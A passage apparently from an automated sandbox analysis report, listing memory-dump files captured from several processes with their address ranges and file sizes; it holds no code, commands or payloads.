                                                                                                                                                    • memory/1076-129-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/1076-128-0x000002613A320000-0x000002613A347000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      156KB

                                                                                                                                                    • memory/1084-132-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/1084-131-0x000002B42FA90000-0x000002B42FAB7000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      156KB

                                                                                                                                                    • memory/1136-134-0x0000022671A90000-0x0000022671AB7000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      156KB

                                                                                                                                                    • memory/1136-135-0x00007FF8EA870000-0x00007FF8EA880000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      64KB

                                                                                                                                                    • memory/1684-92-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      160KB

                                                                                                                                                    • memory/1684-94-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/1684-95-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      756KB

                                                                                                                                                    • memory/1684-93-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      160KB

                                                                                                                                                    • memory/1684-96-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      160KB

                                                                                                                                                    • memory/1904-27-0x000001A818E90000-0x000001A818EE8000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      352KB

                                                                                                                                                    • memory/1904-23-0x000001A818330000-0x000001A818D80000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.3MB

                                                                                                                                                    • memory/1904-87-0x00007FF909990000-0x00007FF90A452000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/1904-357-0x00007FF909990000-0x00007FF90A452000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/1904-32-0x00007FF909990000-0x00007FF90A452000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/1904-4-0x00007FF909993000-0x00007FF909995000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/1904-5-0x000001A878150000-0x000001A878172000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                    • memory/1904-28-0x000001A818EF0000-0x000001A818F12000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      136KB

                                                                                                                                                    • memory/1904-31-0x000001A8191E0000-0x000001A8191EA000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      40KB

                                                                                                                                                    • memory/1904-72-0x00007FF909993000-0x00007FF909995000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                    • memory/1904-1405-0x00007FF909990000-0x00007FF90A452000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/1904-26-0x000001A818E30000-0x000001A818E86000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      344KB

                                                                                                                                                    • memory/1904-25-0x000001A818D80000-0x000001A818E26000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      664KB

                                                                                                                                                    • memory/1904-29-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/1904-22-0x00007FF909990000-0x00007FF90A452000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/1904-21-0x00007FF909990000-0x00007FF90A452000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/1904-20-0x00007FF909990000-0x00007FF90A452000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/1904-19-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      756KB

                                                                                                                                                    • memory/1904-18-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/1904-17-0x000001A818000000-0x000001A818024000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      144KB

                                                                                                                                                    • memory/1904-16-0x00007FF909990000-0x00007FF90A452000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/1904-15-0x00007FF909990000-0x00007FF90A452000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/1904-14-0x00007FF909990000-0x00007FF90A452000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      10.8MB

                                                                                                                                                    • memory/2076-36-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      24KB

                                                                                                                                                    • memory/2076-38-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      24KB

                                                                                                                                                    • memory/3264-77-0x000002C0B92D0000-0x000002C0B9492000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      1.8MB

                                                                                                                                                    • memory/3264-91-0x000002C0B8AE0000-0x000002C0B8B16000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      216KB

                                                                                                                                                    • memory/3264-90-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      756KB

                                                                                                                                                    • memory/3264-89-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/3264-88-0x000002C0B8A00000-0x000002C0B8A4E000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      312KB

                                                                                                                                                    • memory/3264-86-0x000002C0B8AA0000-0x000002C0B8ADC000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      240KB

                                                                                                                                                    • memory/3264-76-0x000002C0B8B60000-0x000002C0B8C12000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      712KB

                                                                                                                                                    • memory/3264-75-0x000002C0B8A50000-0x000002C0B8AA0000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      320KB

                                                                                                                                                    • memory/3264-66-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/3264-65-0x000002C0C1120000-0x000002C0C11D2000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      712KB

                                                                                                                                                    • memory/3264-64-0x000002C0C0CE0000-0x000002C0C111E000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      4.2MB

                                                                                                                                                    • memory/3264-63-0x000002C0C0510000-0x000002C0C0CDA000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      7.8MB

                                                                                                                                                    • memory/3264-62-0x000002C0B7EB0000-0x000002C0B8436000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      5.5MB

                                                                                                                                                    • memory/3264-61-0x00007FF929AD0000-0x00007FF929B8D000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      756KB

                                                                                                                                                    • memory/3264-60-0x00007FF92A7E0000-0x00007FF92A9E9000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      2.0MB

                                                                                                                                                    • memory/4988-35-0x0000000140000000-0x0000000140004000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      16KB

                                                                                                                                                    • memory/4988-33-0x0000000140000000-0x0000000140004000-memory.dmp
                                                                                                                                                      Filesize

                                                                                                                                                      16KB